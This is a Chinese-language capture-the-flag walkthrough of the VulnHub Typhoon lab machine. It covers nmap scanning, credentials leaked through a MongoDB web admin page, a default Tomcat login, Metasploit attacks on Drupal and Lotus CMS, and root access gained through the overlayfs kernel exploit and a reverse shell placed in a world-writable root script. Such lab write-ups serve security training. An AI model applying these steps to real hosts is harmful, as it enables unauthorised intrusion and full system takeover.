靶机下载地址:
- Download: https://drive.google.com/file/d/1rwxlRMOJJ8GGj2VshAOvgqgUM_Z-OV9z/view
- Download (Torrent): https://download.vulnhub.com/typhoon/Typhoon-v1.02.ova.torrent ( Magnet)
靶机渗透难度相对简单,利用方式很多。本文根据https://xz.aliyun.com/t/3643进行复现的。
**
一、信息收集
**
1、1主机发现 发现主机IP:192.168.56.139
1、2端口探测
发现开放了很多端口的,各种常用的服务ftp/ssh/http/mysql等等都开了,80端口还顺带扫出来个/robots.txt。
nmap 获取远程主机的系统类型及开放端口:
nmap -sS -P0 -sV -O <target>
这里的 < target > 可以是单一 IP, 或主机名,或域名,或子网
-sS TCP SYN 扫描 (又称半开放,或隐身扫描)
-P0 允许你关闭 ICMP pings.
-sV 打开系统版本检测
-O 尝试识别远程操作系统
其它选项:
-A 同时打开操作系统指纹和版本检测
-v 详细输出扫描情况.
1.3目录扫描
看到了一些目录
**
二、入侵靶机
**
2.1PHPMOADMIN
访问/robots.txt,是一个mogondb的WebUI管理,
访问http://192.168.56.139/mongoadmin/
看到有两个表,点击开creds,可以看到存有用户名和密码:typhoon/789456123查看版本号。http://192.168.56.139/mongoadmin/index.php?action=getStats
2.2SSH登录
利用上面的用户名和密码,顺利登录到。2.3Tomcat Manager
访问8080端口,登录manager webapp。尝试默认用户名和密码tomcat登录。登录成功,上msf。
2.4Drupal CMS & Lotus CMS
通过目录扫描,发现了此系统的框架这两个CMS都是有问题的版本,就直接用msf的payload打了。
**
三、提权
**
3.1利用内核
查看系统版本、内核信息
系统是Ubuntu14.04,内核版本为3.13.0,searchsploit搜一下相关漏洞。
对应的系统、内核刚好有一个利用overlayfs的exploit,下下来放到靶机上。
搭建文件服务器到,映射到80端口
靶机下载文件
编译、赋权、运行一条龙。
gcc 37292.c -o exploit
chmod a+x exploit
3.2利用可写文件(反弹shell)
翻查目录文件,在/tab/目录下发现一个文件所有者为root、权限为777的sh文件。
用低权限用户将构造的命令写入script.sh,令文件调用以root身份运行的/bin/sh,然后反弹shell,就可以获得root权限了。
写入反弹shell命令到script.sh中并执行。
至此提权成功,利用完成。
另外:在进入靶机之后,可以利用此脚本找到可利用的漏洞,再上msf。
wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x /tmp/linux-exploit-suggester.sh